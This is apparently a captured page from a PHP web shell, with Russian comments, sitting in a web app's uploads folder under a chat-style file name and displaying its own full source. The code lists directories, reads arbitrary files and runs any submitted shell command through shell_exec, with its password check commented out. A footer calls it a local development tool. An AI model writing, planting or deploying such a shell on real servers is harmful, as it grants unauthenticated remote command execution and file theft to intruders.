PHP WebShell
Текущая директория: /var/www/bitcardoApp/uploads/2025/06
Просмотр файла: chat_685114167cf4a.php
<?php
// Простой PHP веб-шелл для работы с файлами и командами через браузер
// --- Авторизация (рекомендуется раскомментировать и изменить пароль) ---
// $auth_pass = "yourstrongpassword";
// if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_PW'] !== $auth_pass) {
// header('WWW-Authenticate: Basic realm="WebShell"');
// header('HTTP/1.0 401 Unauthorized');
// echo 'Auth required'; exit;
// }
echo "<!DOCTYPE html><html><head><title>PHP WebShell</title>
<style>
body{background:#222;color:#ddd;font-family:monospace;}
input,button,select{background:#333;color:#eee;padding:4px;margin:2px;}
a{color:#9df;}
pre{background:#111;padding:10px;border-radius:5px;}
</style>
</head><body>";
echo "<h2>PHP WebShell</h2>";
$dir = isset($_GET['d']) ? $_GET['d'] : getcwd();
$dir = realpath($dir);
chdir($dir);
// Список файлов
echo "<b>Текущая директория:</b> $dir<br>";
echo "<form method='get'><input name='d' value='".htmlspecialchars($dir, ENT_QUOTES)."'>
<button type='submit'>Открыть</button></form>";
echo "<ul>";
if ($dir != "/") {
$parent = dirname($dir);
echo "<li><a href='?d=".urlencode($parent)."'>.. (вверх)</a></li>";
}
foreach (scandir($dir) as $f) {
if ($f == ".") continue;
$path = $dir . DIRECTORY_SEPARATOR . $f;
$url = "?d=" . urlencode($dir) . "&f=" . urlencode($f);
if (is_dir($path))
echo "<li>[DIR] <a href='?d=".urlencode($path)."'>$f</a></li>";
else
echo "<li>[FILE] <a href='$url'>$f</a></li>";
}
echo "</ul>";
// Просмотр файла
if (isset($_GET['f'])) {
$file = $_GET['f'];
$filepath = $dir . DIRECTORY_SEPARATOR . $file;
if (is_file($filepath)) {
echo "<h4>Просмотр файла: ".htmlspecialchars($file, ENT_QUOTES)."</h4>";
echo "<pre>".htmlspecialchars(file_get_contents($filepath))."</pre>";
}
}
// Выполнение команды
echo "<h4>Выполнить команду</h4>
<form method='post'>
<input name='cmd' size='50' autofocus>
<button type='submit'>Выполнить</button>
</form>";
if (isset($_POST['cmd'])) {
$out = shell_exec($_POST['cmd'] . " 2>&1");
echo "<b>Команда:</b> ".htmlspecialchars($_POST['cmd'], ENT_QUOTES)."<br>";
echo "<pre>$out</pre>";
}
echo "<hr><small>Для локальной разработки. Не используйте в интернете!</small>";
echo "</body></html>";
?>Выполнить команду
Для локальной разработки. Не используйте в интернете!